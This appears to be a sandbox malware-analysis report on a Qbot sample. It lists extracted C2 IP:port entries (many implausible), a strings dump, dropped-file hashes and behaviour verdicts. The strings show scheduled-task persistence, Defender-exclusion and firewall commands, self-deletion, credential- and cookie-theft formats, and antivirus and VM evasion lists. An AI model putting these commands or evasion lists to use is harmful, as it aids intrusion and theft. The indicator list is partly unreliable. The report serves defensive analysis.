20.13.41.41:8229

20.45.56.8:12596

200.61.43.34:8239

201.98.50.145:8761

202.248.95.233:21158

203.20.112.44:64780

204.161.37.9:12742

204.34.49.49:12345

207.42.1.45:28517

21.58.37.138:32802

213.44.66.217:39486

214.222.99.148:43377

214.87.83.99:29289

215.176.46.69:28278

215.36.112.122:26215

219.59.152.61:40320

220.91.80.69:12915

220.98.242.97:15136

224.160.220.59:37437

224.21.52.32:31777

226.33.15.44:8293

226.93.172.88:47739

227.81.32.165:8232

228.110.114.116:28772

228.5.105.95:12848

228.9.96.69:27437

23.140.0.95:28267

24.32.121.32:49258

240.211.108.161:44575

248.135.202.74:18944

25.95.160.226:26222

250.37.10.100:55040

252.0.45.115:29793

252.213.8.28:23124

27.13.10.150:2823

28.102.122.197:17218

28.122.115.114:68

29.240.35.49:13856

29.54.44.49:13617

29.55.126.172:12

3.11.65.116:10280

32.101.116.67:35028

32.106.32.60:8245

32.119.104.105:22

32.119.115.105:25622

32.125.120.0:2418

32.134.12.133:9839

32.19.46.108:25966

32.214.46.115:49924

32.24.15.95:11069

32.3.21.189:17505

32.34.157.3:9556

32.34.34.212:36668

32.34.43.167:11042

32.34.43.64:456

32.47.32.50:49802

32.47.68.101:27749

32.47.70.0:2166

32.47.84.78:8226

32.48.197.18:12745

32.49.97.113:27247

32.60.232.115:25972

32.61.32.105:25716

32.62.32.34:11144

32.71.91.8:5296

32.97.108.109:25445

33.101.46.38:18576

33.20.26.215:256

33.4.128.208:8752

33.4.92.45:12813

33.80.44.153:34678

34.1.50.64:13173

34.131.113.157:26209

34.134.57.163:22061

34.43.0.24:55688

34.43.10.180:10283

34.43.34.116:28730

34.44.74.129:47657

34.77.83.88:19788

34.92.34.32:12115

34.92.92.34:11044

35.18.77.111:26434

35.192.1.0:35442

35.24.99.34:7760

35.33.183.152:2313

36.156.141.19:54041

37.49.0.0:11314

38.14.107.183:9792

38.16.16.59:15377

38.3.95.49:11898

38.49.184.0:22909

38.55.38.51:50754

38.62.251.137:50043

38.97.32.61:8282

39.150.226.199:16

4.192.82.32:26995

4.23.56.23:12336

4.99.101.108:34594

40.101.41.208:907

40.105.107.100:29030

40.122.110.100:28023

40.125.32.171:34418

40.196.10.246:2627

40.34.5.0:16708

40.34.80.114:28515

40.51.49.45:63493

40.97.227.209:10072

40.98.32.38:45128

41.18.63.232:9782

41.189.46.2:18041

41.29.32.32:384

42.28.122.29:34780

42.32.141.42:13106

42.32.56.80:10313

42.40.44.156:58329

42.47.44.32:10023

43.0.43.46:17784

43.117.120.106:27743

43.206.43.83:29810

43.253.170.224:15148

43.34.115.107:29592

43.34.49.50:13108

43.43.88.152:12297

43.61.32.49:13952

43.64.43.34:11892

44.118.11.42:24617

44.128.142.21:9818

44.135.97.149:11136

44.173.204.227:54230

44.32.101.110:26726

44.32.101.44:8292

44.32.121.99:26977

44.32.45.24:13356

44.49.50.192:62054

44.49.53.48:11314

44.50.53.51:11313

45.106.0.107:3954

45.132.58.0:41624

45.46.114.101:28780

46.112.104.112:44115

46.112.117.115:26765

46.173.64.213:55287

46.44.32.50:12565

46.97.112.112:27769

47.100.60.113:17249

48.120.70.70:10556

48.236.3.7:25328

48.32.63.32:22334

48.41.123.9:3338

48.42.217.138:53504

48.44.52.48:24757

48.93.44.32:29560

48.98.97.173:10292

49.198.24.156:13070

49.29.101.100:31093

49.42.182.0:1354

49.44.0.4:12600

49.48.57.44:12601

49.52.11.0:12332

49.55.56.44:32

5.10.93.62:15922

5.172.44.46:25976

5.182.219.119:23401

5.225.40.28:16135

5.28.44.49:14191

5.30.58.52:2288

50.44.49.49:518

50.44.76.204:5655

50.48.56.51:13363

50.49.54.44:12596

50.49.96.97:14390

50.50.128.55:174

50.50.51.73:12593

51.110.41.196:45487

51.112.103.119:26995

51.44.49.53:14636

51.50.41.120:62721

52.135.102.23:22854

52.32.41.46:29807

52.34.48.0:48574

52.44.50.53:11313

53.45.53.80:222

53.48.48.50:13369

53.51.226.98:8286

53.54.55.56:14689

54.100.107.97:23816

54.33.61.49:13312

54.38.32.48:30790

55.139.66.201:21248

55.51.51.56:14137

55.63.157.93:10062

56.0.124.61:8241

56.226.33.182:3932

56.57.11.16:14135

57.44.128.32:12849

57.44.55.35:12592

57.45.49.21:19020

57.74.53.44:12597

58.52.48.44:3500

59.0.0.21:30305

59.121.11.145:55591

59.205.100.87:33536

59.224.135.33:25121

59.32.43.43:26912

6.0.61.32:28261

6.160.85.13:2569

60.194.175.166:62729

60.199.234.42:54224

60.29.42.91:8222

60.88.221.16:11034

61.113.106.101:12038

61.254.88.89:3584

61.32.39.92:30768

61.32.4.215:19

61.32.40.0:7713

61.32.48.120:13361

61.32.48.59:2304

61.39.169.93:13620

61.44.75.21:44645

62.50.48.44:14358

62.52.241.67:13353

62.62.40.51:12845

64.101.99.104:28448

64.196.115.108:26979

64.42.111.120:26222

64.86.51.50:29548

65.114.114.97:31016

66.46.83.116:29285

66.9.126.174:53406

67.103.40.32:41157

67.114.101.97:2704

67.134.131.3:10337

67.32.79.78:17221

67.40.105.99:24504

67.68.69.70:0

69.76.32.92:8741

7.0.38.105:27763

7.50.9.24:59986

70.114.111.109:7195

70.9.212.20:33504

71.128.15.22:7981

71.168.78.8:16605

71.203.44.25:32947

73.212.113.42:8950

73.74.75.76:19790

76.79.56.193:45358

77.0.0.92:29800

77.105.110.117:30241

77.51.2.20:8775

78.129.108.113:26993

78.90.90.165:19791

79.4.40.100:29795

8.128.18.119:31340

80.111.71.33:29545

80.121.124.40:27396

80.182.166.55:41137

80.33.45.56:13101

80.37.11.172:63660

81.82.83.84:21846

82.114.120.105:29044

82.117.110.40:36908

82.16.46.217:135

82.67.25.110:30060

82.75.101.68:30726

82.85.80.192:29036

83.0.56.51:11314

83.0.83.79:11576

83.101.5.8:29302

83.104.101.108:27694

84.105.22.30:28005

84.29.34.128:7806

85.76.76.24:60028

86.1.52.48:12343

86.120.112.99:26404

87.88.84.90:0

88.0.111.116:28788

88.143.97.28:12316

88.222.78.32:31818

88.232.33.214:15100

9.102.0.128:11054

9.105.102.32:10278

9.13.10.9:2935

9.25.237.32:15392

9.28.205.0:19567

9.54.93.44:8241

9.97.61.226:15136

9.98.66.12:29285

90.61.107.110:0

91.105.93.177:14947

91.105.93.34:129

91.40.108.5:1964

91.49.55.51:12853

91.50.93.126:10767

92.215.14.128:1822

92.39.32.43:8288

92.92.34.226:12141

93.133.18.254:201

93.250.67.134:42

93.41.141.112:11290

93.61.32.77:24948

94.67.242.24:16594

95.0.100.101:27680

95.100.99.115:30820

95.111.108.11:35487

95.32.94.86:3775

96.213.41.32:26209

96.56.53.57:49928

96.84.84.80:8837

97.101.109.120:10296

97.106.118.107:9799

97.109.101.59:1359

97.110.100.111:27944

97.118.101.84:28486

97.39.41.218:56311

98.101.105.121:28791

98.101.32.14:10528

98.104.106.119:41608

98.111.82.212:55257

98.118.98.17:29037

98.122.97.40:31090

98.26.207.161:17098

98.41.59.77:52547

98.44.108.44:34242

98.45.111.40:12481

98.75.128.26:58194

99.104.97.114:17263

99.114.111.115:28518

99.114.118.37:25193

99.152.12.156:34915

99.73.71.122:25951

99.80.72.19:11662

SaltjHxastDcds)oMc=jvh7wdUhxcsdt2

Strings (433)/F

/c ping.exe -n 6 127.0.0.1 & type "%s\System32\calc.exe" > "%s"

/ru ""

[begin]

[end]

cookie=[%s]

data=[%s]

exe=[%s] cmdline=[%s] pid=[%u] username=[%s]

ext_ip=[%s] dnsname=[%s] hostname=[%s] user=[%S] domain=[%S] is_admin=[%s] os=[%s] qbot_version=[%s] install_time=[%s] exe=[%S] prod_id=[%s]

host=[%s:%u] user=[%s] pass=[%s]

referer=[%s]

url=[%s]

url=[%s] data=[%s]

url=[%s] lb=[%s] data=[%s]

url=[%s] user=[%s] pass=[%s]

"%s\system32\schtasks.exe" /Create /RU "NT AUTHORITY\SYSTEM" /tn %s /tr "\"%s\" /I %s" /SC ONCE /Z /ST %02u:%02u /ET %02u:%02u

"%s\system32\schtasks.exe" /DELETE /F /TN %s

"%s\system32\schtasks.exe" /create /tn %S /tr "%s" /sc %S

%%%BOT_NICK%%%

%02u.%02u.%02u-%02u/%02u/%04u

%BOTID%

%BOT_COMPUTERNAME%

%BOT_MACHINE_UUID%

%BOT_USERDOMAIN%

%BOT_USERNAME%

%BOT_VENDOR_ID%

%ProgramFiles%\Internet Explorer\iexplore.exe

%ProgramFiles(x86)%\Internet Explorer\iexplore.exe

%SystemRoot%\SysWOW64\explorer.exe

%SystemRoot%\SysWOW64\mobsync.exe

%SystemRoot%\System32\mobsync.exe

%SystemRoot%\explorer.exe

%s "$windowsupdate = \"%s\"; & $windowsupdate"

%s %04x.%u %04x.%u res: %s seh_test: %u consts_test: %d vmdetected: %d createprocess: %d

%s \"$windowsupdate = \\\"%s\\\"; & $windowsupdate\"

%s%s/dupinst.php?n=%s&bg=%s&r=%u

%s\%s.vbs

%s\System32\WindowsPowerShell\v1.0\powershell.exe "$windowsupdate = \"%s\"; & $windowsupdate"

%s\System32\WindowsPowerShell\v1.0\powershell.exe \"$windowsupdate = \\\"%s\\\"; & $windowsupdate\"

%u.%s.%s.%08x

*/*

.cfg

.dat

.dll

.exe

.lnk

/bot_serv

/t3

000

1234567890

23.49.13.33:7000

307

308

309

310

311

ADMIN$

ALLUSERSPROFILE

AdjustTokenPrivileges

Administrator

AllocateAndInitializeSid

AvastSvc.exe

ByteFence.exe

C:\\INTERNAL\\__empty

CWSandbox

CertAddCRLContextToStore

CertAddCTLContextToStore

CertAddCertificateContextToStore

CertCloseStore

CertCreateCertificateChainEngine

CertDuplicateCRLContext

CertEnumCertificatesInStore

CertEnumSystemStore

CertFreeCRLContext

CertFreeCertificateChain

CertFreeCertificateChainEngine

CertFreeCertificateContext

CertGetCRLContextProperty

CertGetCertificateChain

CertGetEnhancedKeyUsage

CertGetNameStringW

CertOpenStore

CertSetCertificateContextProperty

CloseHandle

CloseServiceHandle

Content-Type: application/x-www-form-urlencoded

CreateDirectoryA

CreateFileA

CreateFileW

CreateProcessA

CreateProcessW

CreateRemoteThread

CreateServiceW

CreateThread

CreateToolhelp32Snapshot

CreateWindowExA

CredEnumerateA

CredFree

CryptAcquireCertificatePrivateKey

CryptEnumOIDInfo

CryptFindOIDInfo

CryptUnprotectData

DefWindowProcA

DeleteFileA

DeleteService

DeleteServiceW

DeleteUrlCacheEntryW

DestroyWindow

DispatchMessageA

DnsQuery_A

DnsQuery_W

DynamicCodePolicy

ExpandEnvironmentStringsA

FindClose

FindFirstFileA

FindNextFileA

FindWindowA

FreeSid

FtpDeleteFileA

FtpGetFileA

FtpOpenFileA

GenuineIntel

GetClipboardData

GetCurrentDirectoryA

GetCurrentThreadId

GetForegroundWindow

GetMessageA

GetMessageW

GetModuleFileNameA

GetModuleHandleA

GetProcAddress

GetUrlCacheEntryInfoW

GetVolumeInformationA

Global\{EEE80B68-1EF4-47C2-9017-59E46A84F3BC}

HOURLY /mo 5

HttpAddRequestHeadersA

HttpOpenRequestA

HttpOpenRequestW

HttpQueryInfoA

HttpQueryInfoW

HttpSendRequestA

HttpSendRequestExA

HttpSendRequestExW

HttpSendRequestW

IPC$

Initializing database...

InterlockedCompareExchange

InternetCloseHandle

InternetConnectA

InternetCrackUrlA

InternetGetCookieA

InternetGetCookieExA

InternetGetLastResponseInfoA

InternetOpenA

InternetOpenUrlA

InternetQueryDataAvailable

InternetQueryOptionA

InternetQueryOptionW

InternetReadFile

InternetReadFileExA

InternetSetOptionA

InternetSetStatusCallback

InternetWriteFile

LdrGetProcedureAddress

LdrLoadDll

LoadLibraryA

LocalFree

LookupAccountSidA

LookupAccountSidW

MBAMService.exe

MessageBoxA

Microsoft

MicrosoftEdge.exe

Module32First

Module32Next

MoveFileA

Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0

MsMpEng.exe

NAT-PMP %u tcp

NetApiBufferFree

NetGetDCName

NetShareEnum

NetUserEnum

NetWkstaGetInfo

NtAllocateVirtualMemory

NtClose

NtCreateSection

NtFreeVirtualMemory

NtGetContextThread

NtMapViewOfSection

NtProtectVirtualMemory

NtQueryInformationProcess

NtQueryVirtualMemory

NtReadVirtualMemory

NtSetContextThread

NtUnmapViewOfSection

NtWow64QueryInformationProcess64

NtWow64ReadVirtualMemory64

NtWriteVirtualMemory

ObtainUserAgentString

OpenProcess

OpenSCManagerW

OpenThread

PFXExportCertStore

PR_Close

PR_GetError

PR_GetNameForIdentity

PR_OpenTCPSocket

PR_Read

PR_SetError

PR_Write

PStoreCreateInstance

PeekMessageA

PeekMessageW

PostMessageA

PostQuitMessage

Process32First

Process32Next

ProfileImagePath

QEMU

QueryFullProcessImageNameW

Query_Main

RapportGP.DLL

ReadFile

ReadProcessMemory

Red Hat VirtIO

RegCloseKey

RegCreateKeyExA

RegDeleteValueA

RegEnumKeyExA

RegEnumValueA

RegOpenKeyExA

RegQueryInfoKeyA

RegQueryValueExA

RegSetValueExA

RegisterClassExA

RtlGetVersion

RtlNtStatusToDosError

RtlSetLastWin32Error

SAVAdminService.exe;SavService.exe

SOFTWARE\Microsoft\Internet Explorer\CodeIntegrity

SOFTWARE\Microsoft\Microsoft AntiMalware\SpyNet

SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Paths

SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths

SOFTWARE\Microsoft\Windows Defender\SpyNet

SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList

SOFTWARE\Microsoft\Windows\CurrentVersion\Run

SOFTWARE\Wow6432Node\Microsoft AntiMalware\SpyNet

SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Spynet

SbieDll.dll

Self test FAILED!!!

Self test OK.

SendMessageA

SetCurrentDirectoryA

SetEndOfFile

SetEntriesInAclA

SetFilePointer

SetLastError

SetNamedSecurityInfoA

ShellExecuteA

ShowWindow

SpyNetReporting

StackWalk64

StartServiceW

SubmitSamplesConsent

TranslateMessage

UnregisterClassA

UpdateWindow

VBoxGuest

VBoxVideo

VMAUDIO

VMware Accelerated

VMware Pointing

VMware Replay

VMware SCSI

VMware SVGA

VMware VMaudio

VMware Vista

VMware server memory

Virtual HD

VirtualAllocEx

VirtualFreeEx

VirtualProtect

VirtualProtectEx

WBJ_IGNORE

WEEKLY /D TUE,WED /ST 12:00:00

WNetAddConnection2W

WNetCancelConnection2W

WNetCloseEnum

WNetEnumResourceW

WNetOpenEnumW

WRSA.exe

WSAConnect

WSAGetLastError

WSASend

WSASetLastError

WTSEnumerateSessionsW

WTSFreeMemory

WTSQueryUserToken

WaitForSingleObject

Windows10 Edge HttpQueryInfo Bug!!!

WriteFile

WriteProcessMemory

ZwQueryInformationThread

ZwResumeThread

\sf2.dll

aabcdeefghiijklmnoopqrstuuvwxyyz

aaebcdeeifghiiojklmnooupqrstuuyvwxyyaz

abc

abcdefghijklmnopqrstuvwxyz

administrator,argo,operator,administrador,user,prof,owner,usuario,admin,HP_Administrator,HP_Owner,Compaq_Owner,Compaq_Administrator

advapi32.dll

ansfltr

application/x-shockwave-flash

artifact.exe

aswhooka.dll

aswhookx.dll

avcuf32.dll

avgcsrvx.exe;avgsvcx.exe;avgcsrva.exe

avp.exe

bdagent.exe;vsserv.exe;vsservppl.exe

c:\hiberfil.sysss

cashmanagementconnectionstring

ccSvcHst.exe

chrome.dll

chrome_child.dll

cmd /c schtasks.exe /Query > "%s"

cmd.exe /C \"start /MIN %s\system32\cscript.exe //E:javascript \"%s\"\"

cmd.exe /c ping -n 10 localhost && rmdir /S /Q "%s"

cmd=1&msg=%s&ports=

connect

content.bigflimz.com

coreServiceShell.exe;PccNTMon.exe;NTRTScan.exe

crypt32.dll

cryptui.dll

cscript.exe

data_after

data_before

data_end

data_inject

dbghelp.dll

dnsapi.dll

egui.exe;ekrn.exe

error res='%s' err=%d len=%u

exclude_url

explorer.exe

firefox.exe

fmon.exe

fshoster32.exe

https://

https://cdn.speedof.me/sample4096k.bin?r=0.%u

https://en.wikipedia.org/static/apple-touch/wikipedia.png

ignore_url

image/gif

image/jpeg

image/pjpeg

ivm-inject.dll

jHxastDcds)oMc=jvh7wdUhxcsdt2

kernel32.dll

mcshield.exe

metsvc-server.exe

mlwr_smpl

mpr.dll

netapi32.dll

netsh advfirewall firewall add rule name="%s" dir=in action=allow program="%s" enable=yes

netsh firewall set allowedprogram "%s" %s ENABLE

netteller.com

nspr4.dll

nss3.dll

ntdll.dll

pstorec.dll

qbot_conf_path='%S' username='%S'

qbot_run_mutex='%s' username='%S'

reg.exe ADD "HKLM\%s" /f /t %s /v "%s" /d "%s"

rsabase.dll

rsaenh.dll

sample

sbtisht

send

set_url

shell32.dll

siteadvisor.com;avgthreatlabs.com;safeweb.norton.com

srootkit

t=%s time=[%02d:%02d:%02d-%02d/%02d/%d]

tcpdump.exe;windump.exe;ethereal.exe;wireshark.exe;ettercap.exe;rtsniff.exe;packetcapture.exe;capturenet.exe

urlmon.dll

user32.dll

vSockets

vkise.exe;isesrv.exe;cmdagent.exe

vm3dmp

vmacthlp.exe

vmdebug

vmnat.exe

vmrawdsk

vmscsi

vmtoolsd.exe

vmx_svga

vmxnet

wbj.go

webinjects.cb

windbg.exe;ChromeUpdate.exe;msdev.exe;dbgview.exe;ollydbg.exe;ctfmon.exe;Proxifier.exe;nav.exe;Microsoft.Notes.exe;ShellExperienceHost.exe;SecHealthUI.exe

windump.exe

wininet.dll

wpcap.dll

wpl

wpq

ws2_32.dll

wtsapi32.dll

{%02X%02X%02X%02X-%02X%02X-%02X%02X-%02X%02X-%02X%02X%02X%02X%02X%02X}

6528

C:\WINDOWS\System32\slui.exe -Embedding

C:\Windows\System32\slui.exe

—

svchost.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Windows Activation Client

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll

7016

ping.exe -n 6 127.0.0.1

C:\Windows\SysWOW64\PING.EXE

—

cmd.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

TCP/IP Ping Command

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\syswow64\ping.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll

Add for printing

Total events

1 095

Read events

1 095

Write events

Delete events

Modification events

No data

Add for printing

Executable files

Suspicious files

Text files

Unknown types

Dropped files

PID	Process	Filename		Type
2848	444444.png.exe	C:\Users\admin\AppData\Roaming\Microsoft\Olhgykmnnfgq\fsoevv.dat		binary
		MD5:CADC60373BEAE685EF17E8AA94D90365	SHA256:EC6ADDA3B436163B2759636137013256FCA656BC08737850E04170DE0A05E6AD
4844	cmd.exe	C:\Users\admin\AppData\Local\Temp\444444.png.exe		executable
		MD5:961E093BE1F666FD38602AD90A5F480F	SHA256:B183BD6414C5123465075D76D2413C999D569492FB543ACBC29690B4B745BDF2
2848	444444.png.exe	C:\Users\admin\AppData\Roaming\Microsoft\Olhgykmnnfgq\fsoevv.exe		executable
		MD5:C43367EBAB80194FE69258CA9BE4AC68	SHA256:56EE803FA903AB477F939B3894AF6771AEBF0138ABE38AE8E3C41CF96BBB0F2A

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Add for printing

HTTP(S) requests

TCP/UDP connections

DNS requests

Threats

HTTP requests

PID	Process	Method	HTTP Code	IP	URL	CN	Type	Size	Reputation
1268	svchost.exe	GET	200	2.16.168.114:80	http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl	unknown	—	—	whitelisted
1268	svchost.exe	GET	200	2.23.246.101:80	http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl	unknown	—	—	whitelisted
2668	svchost.exe	GET	200	2.23.77.188:80	http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D	unknown	—	—	whitelisted
1156	SIHClient.exe	GET	200	95.101.149.131:80	http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl	unknown	—	—	whitelisted
1156	SIHClient.exe	GET	200	95.101.149.131:80	http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl	unknown	—	—	whitelisted

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID	Process	IP	Domain	ASN	CN	Reputation
4	System	192.168.100.255:137	—	—	—	whitelisted
5944	MoUsoCoreWorker.exe	4.231.128.59:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	IE	whitelisted
6756	RUXIMICS.exe	4.231.128.59:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	IE	whitelisted
1268	svchost.exe	4.231.128.59:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	IE	whitelisted
4	System	192.168.100.255:138	—	—	—	whitelisted
1268	svchost.exe	2.16.168.114:80	crl.microsoft.com	Akamai International B.V.	RU	whitelisted
1268	svchost.exe	2.23.246.101:80	www.microsoft.com	Ooredoo Q.S.C.	QA	whitelisted
2668	svchost.exe	20.190.159.23:443	login.live.com	MICROSOFT-CORP-MSN-AS-BLOCK	IE	whitelisted
2668	svchost.exe	2.23.77.188:80	ocsp.digicert.com	AKAMAI-AS	DE	whitelisted
5944	MoUsoCoreWorker.exe	51.124.78.146:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	NL	whitelisted

DNS requests

Domain	IP	Reputation
google.com	142.250.186.174	whitelisted
settings-win.data.microsoft.com	4.231.128.59 51.124.78.146	whitelisted
crl.microsoft.com	2.16.168.114 2.16.168.124	whitelisted
www.microsoft.com	2.23.246.101 95.101.149.131	whitelisted
login.live.com	20.190.159.23 20.190.159.131 20.190.159.71 20.190.159.130 20.190.159.68 40.126.31.69 40.126.31.73 40.126.31.3	whitelisted
ocsp.digicert.com	2.23.77.188	whitelisted
nexusrules.officeapps.live.com	52.111.243.29	whitelisted
slscr.update.microsoft.com	4.175.87.197	whitelisted
fe3cr.delivery.mp.microsoft.com	40.69.42.241	whitelisted
client.wns.windows.com	172.211.123.250	whitelisted

Threats

PID	Process	Class	Message
—	—	Unknown Traffic	ET USER_AGENTS Microsoft Dr Watson User-Agent (MSDW)

Add for printing

Process	Message
444444.png.exe	ZBZQBZ
444444.png.exe	ZBZQBZ
fsoevv.exe	ZBZQBZ
fsoevv.exe	ZBZQBZ

General Info

444444.png

C43367EBAB80194FE69258CA9BE4AC68

D5168670355C872EC98CDF0FE60F8CA563D39305

56EE803FA903AB477F939B3894AF6771AEBF0138ABE38AE8E3C41CF96BBB0F2A

6144:+ZKDKl51Cdf40jOmzw4Q1UPUGPr+s7gS/EMUMNiXIJsvSPONZqRur/zN:7uf4bamzlPUGPrRcMjN9JFPiV

Software environment set and analysis options

Launch configuration

Software preset

Hotfixes

Behavior activities

MALICIOUS

QBOT mutex has been found

QBOT has been detected (YARA)

Qbot is detected

SUSPICIOUS

Application launched itself

Executable content was dropped or overwritten

There is functionality for taking screenshot (YARA)

Starts itself from another location

Reads security settings of Internet Explorer

Process drops legitimate windows executable

Starts CMD.EXE for commands execution

Runs PING.EXE to delay simulation

INFO

The sample compiled with english language support

Checks supported languages

Reads the computer name

Creates files or folders in the user directory

Reads security settings of Internet Explorer

Create files in a temporary directory

Process checks computer location settings

Malware configuration

Qbot

Static information

TRiD

EXIF

EXE

Video and screenshots

Processes

Behavior graph

Specs description

Process information

Information

Modules

Information

Modules

Information

Modules

Malware configuration

Qbot

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Malware configuration

Qbot

Information

Modules

Information

Modules

Registry activity

Modification events

Files activity

Dropped files

Network activity

HTTP requests

Connections

DNS requests

Threats

Debug output strings